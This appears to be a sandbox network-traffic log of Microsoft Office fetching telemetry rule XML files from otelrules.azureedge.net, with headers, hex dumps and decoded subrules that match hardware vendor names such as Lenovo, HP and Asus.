                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              7192.168.2.46372213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:56 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                              x-ms-request-id: 6c1a5441-101e-00a2-7008-2c9f2e000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061556Z-16ccfc498972q798hC1DFWe4nw00000001u0000000002ery
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              8192.168.2.46372313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:56 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                              x-ms-request-id: ab6d44c0-401e-005b-6508-2c9c0c000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061556Z-16ccfc49897774xmhC1DFWuraw00000001q0000000001ut2
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              9192.168.2.46372613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:56 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 467
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                              x-ms-request-id: 12e859be-a01e-0098-7408-2c8556000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061556Z-16dc884887b6v426hC1DFWstvw00000001t00000000018n5
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              10192.168.2.46372513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:56 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 632
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                              x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061556Z-16ccfc498978mvxwhC1DFWafzn00000001t0000000009e11
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:56 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              11192.168.2.46372913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:57 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                              x-ms-request-id: e0a62fb0-501e-000a-4d47-2c0180000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061557Z-16dc884887bb4p45hC1DFWv3z000000001qg00000000ahge
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              12192.168.2.46372713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:57 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                              x-ms-request-id: 718751ec-501e-0078-1528-2c06cf000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061557Z-176bd8f9bc55l2dfhC1DFWw03w00000001rg000000006ee0
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              13192.168.2.46373013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:57 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                              x-ms-request-id: ab97492c-801e-007b-8024-2ce7ab000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061557Z-r159446fcd7dm7pfhC1DFWkcfc00000000tg00000000d8c6
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              14192.168.2.46372813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:57 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                              x-ms-request-id: 250fb995-801e-0078-4343-2bbac6000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061557Z-16ccfc498974624whC1DFWdg3800000001m00000000080ky
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              15192.168.2.46373113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:57 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                              x-ms-request-id: 2e3917f7-a01e-0053-4b5c-2c8603000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061557Z-r159446fcd7rrql5hC1DFWp150000000016000000000cqm5
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
